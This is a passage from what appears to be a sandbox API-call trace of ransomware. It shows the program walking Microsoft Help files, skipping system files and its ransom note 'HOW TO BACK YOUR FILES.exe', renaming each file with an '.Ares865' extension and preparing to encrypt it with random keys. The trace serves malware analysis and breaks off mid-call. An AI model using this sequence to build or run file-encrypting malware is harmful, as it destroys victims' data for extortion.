[0083.357] lstrlenW (lpString="accde") returned 5 [0083.357] lstrcmpiW (lpString1="3.hxn", lpString2="accde") returned -1 [0083.357] lstrlenW (lpString="accdr") returned 5 [0083.357] lstrcmpiW (lpString1="3.hxn", lpString2="accdr") returned -1 [0083.357] lstrlenW (lpString="accdt") returned 5 [0083.358] lstrcmpiW (lpString1="3.hxn", lpString2="accdt") returned -1 [0083.358] lstrlenW (lpString="accdw") returned 5 [0083.358] lstrcmpiW (lpString1="3.hxn", lpString2="accdw") returned -1 [0083.358] lstrlenW (lpString="accft") returned 5 [0083.358] lstrcmpiW (lpString1="3.hxn", lpString2="accft") returned -1 [0083.358] lstrlenW (lpString="adb") returned 3 [0083.358] lstrcmpiW (lpString1="hxn", lpString2="adb") returned 1 [0083.358] lstrlenW (lpString="adb") returned 3 [0083.358] lstrcmpiW (lpString1="hxn", lpString2="adb") returned 1 [0083.358] lstrlenW (lpString="ade") returned 3 [0083.358] lstrcmpiW (lpString1="hxn", lpString2="ade") returned 1 [0083.358] lstrlenW (lpString="adf") returned 3 [0083.358] lstrcmpiW (lpString1="hxn", lpString2="adf") returned 1 [0083.358] lstrlenW (lpString="adn") returned 3 [0083.358] lstrcmpiW (lpString1="hxn", lpString2="adn") returned 1 [0083.358] lstrlenW (lpString="adp") returned 3 [0083.358] lstrcmpiW (lpString1="hxn", lpString2="adp") returned 1 [0083.358] lstrlenW (lpString="alf") returned 3 [0083.358] lstrcmpiW (lpString1="hxn", lpString2="alf") returned 1 [0083.358] lstrlenW (lpString="ask") returned 3 [0083.358] lstrcmpiW (lpString1="hxn", lpString2="ask") returned 1 [0083.358] lstrlenW (lpString="btr") returned 3 [0083.358] lstrcmpiW (lpString1="hxn", lpString2="btr") returned 1 [0083.358] lstrlenW (lpString="cat") returned 3 [0083.358] lstrcmpiW (lpString1="hxn", lpString2="cat") returned 1 [0083.358] lstrlenW (lpString="cdb") returned 3 [0083.358] lstrcmpiW (lpString1="hxn", lpString2="cdb") returned 1 [0083.358] lstrlenW (lpString="ckp") returned 3 [0083.358] lstrcmpiW (lpString1="hxn", lpString2="ckp") returned 1 [0083.358] lstrlenW (lpString="cma") returned 3 [0083.358] lstrcmpiW (lpString1="hxn", lpString2="cma") returned 1 [0083.358] lstrlenW (lpString="cpd") returned 3 [0083.358] lstrcmpiW (lpString1="hxn", lpString2="cpd") returned 1 [0083.358] lstrlenW (lpString="dacpac") returned 6 [0083.358] lstrcmpiW (lpString1="33.hxn", lpString2="dacpac") returned -1 [0083.358] lstrlenW (lpString="dad") returned 3 [0083.358] lstrcmpiW (lpString1="hxn", lpString2="dad") returned 1 [0083.358] lstrlenW (lpString="dadiagrams") returned 10 [0083.359] lstrcmpiW (lpString1="4.1033.hxn", lpString2="dadiagrams") returned -1 [0083.359] lstrlenW (lpString="daschema") returned 8 [0083.359] lstrcmpiW (lpString1="1033.hxn", lpString2="daschema") returned -1 [0083.359] lstrlenW (lpString="db-journal") returned 10 [0083.359] lstrcmpiW (lpString1="4.1033.hxn", lpString2="db-journal") returned -1 [0083.359] lstrlenW (lpString="db-shm") returned 6 [0083.359] lstrcmpiW (lpString1="33.hxn", lpString2="db-shm") returned -1 [0083.359] lstrlenW (lpString="db-wal") returned 6 [0083.359] lstrcmpiW (lpString1="33.hxn", lpString2="db-wal") returned -1 [0083.359] lstrlenW (lpString="dbc") returned 3 [0083.359] lstrcmpiW (lpString1="hxn", lpString2="dbc") returned 1 [0083.359] lstrlenW (lpString="dbs") returned 3 [0083.359] lstrcmpiW (lpString1="hxn", lpString2="dbs") returned 1 [0083.359] lstrlenW (lpString="dbt") returned 3 [0083.359] lstrcmpiW (lpString1="hxn", lpString2="dbt") returned 1 [0083.359] lstrlenW (lpString="dbv") returned 3 [0083.359] lstrcmpiW (lpString1="hxn", lpString2="dbv") returned 1 [0083.359] lstrlenW (lpString="dbx") returned 3 [0083.359] lstrcmpiW (lpString1="hxn", lpString2="dbx") returned 1 [0083.359] lstrlenW (lpString="dcb") returned 3 [0083.359] lstrcmpiW (lpString1="hxn", lpString2="dcb") returned 1 [0083.359] lstrcmpiW (lpString1="hxn", lpString2="dct") returned 1 [0083.360] lstrcmpiW (lpString1="hxn", lpString2="dcx") returned 1 [0083.360] lstrcmpiW (lpString1="hxn", lpString2="ddl") returned 1 [0083.360] lstrcmpiW (lpString1=".hxn", lpString2="dlis") returned -1 [0083.360] lstrcmpiW (lpString1="hxn", lpString2="dp1") returned 1 [0083.360] lstrcmpiW (lpString1="hxn", lpString2="dqy") returned 1 [0083.360] lstrcmpiW (lpString1="hxn", lpString2="dsk") returned 1 [0083.360] lstrcmpiW (lpString1="hxn", lpString2="dsn") returned 1 [0083.360] lstrcmpiW (lpString1=".hxn", lpString2="dtsx") returned -1 [0083.360] lstrcmpiW (lpString1="hxn", lpString2="dxl") returned 1 [0083.361] lstrcmpiW (lpString1="hxn", lpString2="eco") returned 1 [0083.361] lstrcmpiW (lpString1="hxn", lpString2="ecx") returned 1 [0083.361] lstrcmpiW (lpString1="hxn", lpString2="edb") returned 1 [0083.361] lstrcmpiW (lpString1=".hxn", lpString2="epim") returned -1 [0083.361] lstrcmpiW (lpString1="hxn", lpString2="fcd") returned 1 [0083.361] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft Help\\MS.EXCEL.14.1033.hxn.Ares865") returned 62 [0083.361] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft Help\\MS.EXCEL.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.excel.14.1033.hxn"), lpNewFileName="C:\\Users\\All Users\\Microsoft Help\\MS.EXCEL.14.1033.hxn.Ares865" (normalized: "c:\\users\\all users\\microsoft help\\ms.excel.14.1033.hxn.ares865"), dwFlags=0x1) returned 1 [0083.363] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.EXCEL.14.1033.hxn.Ares865" (normalized: "c:\\users\\all users\\microsoft help\\ms.excel.14.1033.hxn.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0083.364] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=326) returned 1 [0083.364] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0083.364] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0083.364] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0083.364] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0083.365] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0083.365] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0083.365] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x450, lpName=0x0) returned 0x15c [0083.368] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x450) returned 0x190000 [0083.368] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0083.369] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0083.369] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0083.369] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0083.369] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0083.369] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0083.369] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0083.369] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0083.369] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0083.369] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0083.370] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0083.370] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0083.370] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0083.370] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0083.370] CloseHandle (hObject=0x15c) returned 1 [0083.370] CloseHandle (hObject=0x118) returned 1 [0083.370] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0083.370] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0083.370] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0083.370] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xfa755d70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa755d70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa7a2030, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x15e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.EXCEL.DEV.14.1033.hxn", cAlternateFileName="MSEXCE~2.HXN")) returned 1 [0083.370] lstrcmpiW (lpString1="MS.EXCEL.DEV.14.1033.hxn", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0083.370] lstrcmpiW (lpString1="MS.EXCEL.DEV.14.1033.hxn", lpString2="aoldtz.exe") returned 1 [0083.370] lstrcmpiW (lpString1="MS.EXCEL.DEV.14.1033.hxn", lpString2=".") returned 1 [0083.370] lstrcmpiW (lpString1="MS.EXCEL.DEV.14.1033.hxn", lpString2="..") returned 1 [0083.370] lstrcmpiW (lpString1="MS.EXCEL.DEV.14.1033.hxn", lpString2="windows") returned -1 [0083.370] lstrcmpiW (lpString1="MS.EXCEL.DEV.14.1033.hxn", lpString2="bootmgr") returned 1 [0083.370] lstrcmpiW (lpString1="MS.EXCEL.DEV.14.1033.hxn", lpString2="temp") returned -1 [0083.370] lstrcmpiW (lpString1="MS.EXCEL.DEV.14.1033.hxn", lpString2="pagefile.sys") returned -1 [0083.370] lstrcmpiW (lpString1="MS.EXCEL.DEV.14.1033.hxn", lpString2="boot") returned 1 [0083.371] lstrcmpiW (lpString1="MS.EXCEL.DEV.14.1033.hxn", lpString2="ids.txt") returned 1 [0083.371] lstrcmpiW (lpString1="MS.EXCEL.DEV.14.1033.hxn", lpString2="ntuser.dat") returned -1 [0083.371] lstrcmpiW (lpString1="MS.EXCEL.DEV.14.1033.hxn", lpString2="perflogs") returned -1 [0083.371] lstrcmpiW (lpString1="MS.EXCEL.DEV.14.1033.hxn", lpString2="MSBuild") returned -1 [0083.371] lstrlenW (lpString="MS.EXCEL.DEV.14.1033.hxn") returned 24 [0083.371] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft Help\\MS.EXCEL.14.1033.hxn") returned 54 [0083.371] lstrcpyW (in: lpString1=0x2cce444, lpString2="MS.EXCEL.DEV.14.1033.hxn" | out: lpString1="MS.EXCEL.DEV.14.1033.hxn") returned="MS.EXCEL.DEV.14.1033.hxn" [0083.371] lstrlenW (lpString="MS.EXCEL.DEV.14.1033.hxn") returned 24 [0083.371] lstrlenW (lpString="Ares865") returned 7 [0083.371] lstrcmpiW (lpString1="033.hxn", lpString2="Ares865") returned -1 [0083.371] lstrlenW (lpString=".dll") returned 4 [0083.371] lstrcmpiW (lpString1="MS.EXCEL.DEV.14.1033.hxn", lpString2=".dll") returned 1 [0083.371] lstrlenW (lpString=".lnk") returned 4 [0083.371] lstrcmpiW (lpString1="MS.EXCEL.DEV.14.1033.hxn", lpString2=".lnk") returned 1 [0083.371] lstrlenW (lpString=".ini") returned 4 [0083.371] lstrcmpiW (lpString1="MS.EXCEL.DEV.14.1033.hxn", lpString2=".ini") returned 1 [0083.371] lstrlenW (lpString=".sys") returned 4 [0083.371] lstrcmpiW (lpString1="MS.EXCEL.DEV.14.1033.hxn", lpString2=".sys") returned 1 [0083.371] lstrlenW (lpString="MS.EXCEL.DEV.14.1033.hxn") returned 24 [0083.371] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn.Ares865") returned 66 [0083.371] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.excel.dev.14.1033.hxn"), lpNewFileName="C:\\Users\\All Users\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn.Ares865" (normalized: "c:\\users\\all users\\microsoft help\\ms.excel.dev.14.1033.hxn.ares865"), dwFlags=0x1) returned 1 [0083.372] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn.Ares865" (normalized: "c:\\users\\all users\\microsoft help\\ms.excel.dev.14.1033.hxn.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0083.372] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=350) returned 1 [0083.372] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0083.373] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0083.373] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0083.373] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0083.373] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0083.373] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0083.373] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x460, lpName=0x0) returned 0x15c [0083.378] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x460) returned 0x190000 [0083.380] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0083.381] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0083.381] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0083.381] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0083.381] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0083.381] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0083.381] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0083.381] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0083.381] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0083.381] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0083.381] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0083.381] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0083.381] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0083.381] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0083.381] CloseHandle (hObject=0x15c) returned 1 [0083.381] CloseHandle (hObject=0x118) returned 1 [0083.381] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0083.381] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0083.381] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0083.382] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xef377f10, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef377f10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef3ea330, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x146, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.GRAPH.14.1033.hxn", cAlternateFileName="MSGRAP~1.HXN")) returned 1 [0083.382] lstrcmpiW (lpString1="MS.GRAPH.14.1033.hxn", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0083.382] lstrcmpiW (lpString1="MS.GRAPH.14.1033.hxn", lpString2="aoldtz.exe") returned 1 [0083.382] lstrcmpiW (lpString1="MS.GRAPH.14.1033.hxn", lpString2=".") returned 1 [0083.382] lstrcmpiW (lpString1="MS.GRAPH.14.1033.hxn", lpString2="..") returned 1 [0083.382] lstrcmpiW (lpString1="MS.GRAPH.14.1033.hxn", lpString2="windows") returned -1 [0083.382] lstrcmpiW (lpString1="MS.GRAPH.14.1033.hxn", lpString2="bootmgr") returned 1 [0083.382] lstrcmpiW (lpString1="MS.GRAPH.14.1033.hxn", lpString2="temp") returned -1 [0083.382] lstrcmpiW (lpString1="MS.GRAPH.14.1033.hxn", lpString2="pagefile.sys") returned -1 [0083.382] lstrcmpiW (lpString1="MS.GRAPH.14.1033.hxn", lpString2="boot") returned 1 [0083.382] lstrcmpiW (lpString1="MS.GRAPH.14.1033.hxn", lpString2="ids.txt") returned 1 [0083.382] lstrcmpiW (lpString1="MS.GRAPH.14.1033.hxn", lpString2="ntuser.dat") returned -1 [0083.382] lstrcmpiW (lpString1="MS.GRAPH.14.1033.hxn", lpString2="perflogs") returned -1 [0083.382] lstrcmpiW (lpString1="MS.GRAPH.14.1033.hxn", lpString2="MSBuild") returned -1 [0083.382] lstrlenW (lpString="MS.GRAPH.14.1033.hxn") returned 20 [0083.382] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn") returned 58 [0083.382] lstrcpyW (in: lpString1=0x2cce444, lpString2="MS.GRAPH.14.1033.hxn" | out: lpString1="MS.GRAPH.14.1033.hxn") returned="MS.GRAPH.14.1033.hxn" [0083.382] lstrlenW (lpString="MS.GRAPH.14.1033.hxn") returned 20 [0083.382] lstrlenW (lpString="Ares865") returned 7 [0083.382] lstrcmpiW (lpString1="033.hxn", lpString2="Ares865") returned -1 [0083.382] lstrlenW (lpString=".dll") returned 4 [0083.382] lstrcmpiW (lpString1="MS.GRAPH.14.1033.hxn", lpString2=".dll") returned 1 [0083.382] lstrlenW (lpString=".lnk") returned 4 [0083.382] lstrcmpiW (lpString1="MS.GRAPH.14.1033.hxn", lpString2=".lnk") returned 1 [0083.382] lstrlenW (lpString=".ini") returned 4 [0083.382] lstrcmpiW (lpString1="MS.GRAPH.14.1033.hxn", lpString2=".ini") returned 1 [0083.382] lstrlenW (lpString=".sys") returned 4 [0083.382] lstrcmpiW (lpString1="MS.GRAPH.14.1033.hxn", lpString2=".sys") returned 1 [0083.382] lstrlenW (lpString="MS.GRAPH.14.1033.hxn") returned 20 [0083.383] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft Help\\MS.GRAPH.14.1033.hxn.Ares865") returned 62 [0083.383] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft Help\\MS.GRAPH.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.graph.14.1033.hxn"), lpNewFileName="C:\\Users\\All Users\\Microsoft Help\\MS.GRAPH.14.1033.hxn.Ares865" (normalized: "c:\\users\\all users\\microsoft help\\ms.graph.14.1033.hxn.ares865"), dwFlags=0x1) returned 1 [0083.385] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.GRAPH.14.1033.hxn.Ares865" (normalized: "c:\\users\\all users\\microsoft help\\ms.graph.14.1033.hxn.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0083.385] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=326) returned 1 [0083.385] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0083.385] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0083.385] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0083.385] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0083.386] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0083.386] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0083.386] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x450, lpName=0x0) returned 0x15c [0083.389] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x450) returned 0x190000 [0083.390] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0083.391] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0083.391] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0083.391] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0083.391] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0083.391] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0083.391] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0083.391] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0083.391] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0083.391] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0083.391] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0083.391] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0083.391] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0083.391] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0083.391] CloseHandle (hObject=0x15c) returned 1 [0083.391] CloseHandle (hObject=0x118) returned 1 [0083.391] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0083.392] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0083.392] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0083.392] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xfd789af0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfd789af0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfd822070, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x14c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.GROOVE.14.1033.hxn", cAlternateFileName="MSGROO~1.HXN")) returned 1 [0083.392] lstrcmpiW (lpString1="MS.GROOVE.14.1033.hxn", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0083.392] lstrcmpiW (lpString1="MS.GROOVE.14.1033.hxn", lpString2="aoldtz.exe") returned 1 [0083.392] lstrcmpiW (lpString1="MS.GROOVE.14.1033.hxn", lpString2=".") returned 1 [0083.392] lstrcmpiW (lpString1="MS.GROOVE.14.1033.hxn", lpString2="..") returned 1 [0083.392] lstrcmpiW (lpString1="MS.GROOVE.14.1033.hxn", lpString2="windows") returned -1 [0083.392] lstrcmpiW (lpString1="MS.GROOVE.14.1033.hxn", lpString2="bootmgr") returned 1 [0083.392] lstrcmpiW (lpString1="MS.GROOVE.14.1033.hxn", lpString2="temp") returned -1 [0083.392] lstrcmpiW (lpString1="MS.GROOVE.14.1033.hxn", lpString2="pagefile.sys") returned -1 [0083.392] lstrcmpiW (lpString1="MS.GROOVE.14.1033.hxn", lpString2="boot") returned 1 [0083.392] lstrcmpiW (lpString1="MS.GROOVE.14.1033.hxn", lpString2="ids.txt") returned 1 [0083.392] lstrcmpiW (lpString1="MS.GROOVE.14.1033.hxn", lpString2="ntuser.dat") returned -1 [0083.392] lstrcmpiW (lpString1="MS.GROOVE.14.1033.hxn", lpString2="perflogs") returned -1 [0083.392] lstrcmpiW (lpString1="MS.GROOVE.14.1033.hxn", lpString2="MSBuild") returned -1 [0083.392] lstrlenW (lpString="MS.GROOVE.14.1033.hxn") returned 21 [0083.392] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft Help\\MS.GRAPH.14.1033.hxn") returned 54 [0083.392] lstrcpyW (in: lpString1=0x2cce444, lpString2="MS.GROOVE.14.1033.hxn" | out: lpString1="MS.GROOVE.14.1033.hxn") returned="MS.GROOVE.14.1033.hxn" [0083.392] lstrlenW (lpString="MS.GROOVE.14.1033.hxn") returned 21 [0083.392] lstrlenW (lpString="Ares865") returned 7 [0083.392] lstrcmpiW (lpString1="033.hxn", lpString2="Ares865") returned -1 [0083.392] lstrlenW (lpString=".dll") returned 4 [0083.392] lstrcmpiW (lpString1="MS.GROOVE.14.1033.hxn", lpString2=".dll") returned 1 [0083.392] lstrlenW (lpString=".lnk") returned 4 [0083.392] lstrcmpiW (lpString1="MS.GROOVE.14.1033.hxn", lpString2=".lnk") returned 1 [0083.392] lstrlenW (lpString=".ini") returned 4 [0083.392] lstrcmpiW (lpString1="MS.GROOVE.14.1033.hxn", lpString2=".ini") returned 1 [0083.393] lstrlenW (lpString=".sys") returned 4 [0083.393] lstrcmpiW (lpString1="MS.GROOVE.14.1033.hxn", lpString2=".sys") returned 1 [0083.393] lstrlenW (lpString="MS.GROOVE.14.1033.hxn") returned 21 [0083.393] lstrlenW (lpString="bak") returned 3 [0083.393] lstrcmpiW (lpString1="hxn", lpString2="bak") returned 1 [0083.393] lstrlenW (lpString="ba_") returned 3 [0083.393] lstrcmpiW (lpString1="hxn", lpString2="ba_") returned 1 [0083.393] lstrlenW (lpString="dbb") returned 3 [0083.393] lstrcmpiW (lpString1="hxn", lpString2="dbb") returned 1 [0083.393] lstrlenW 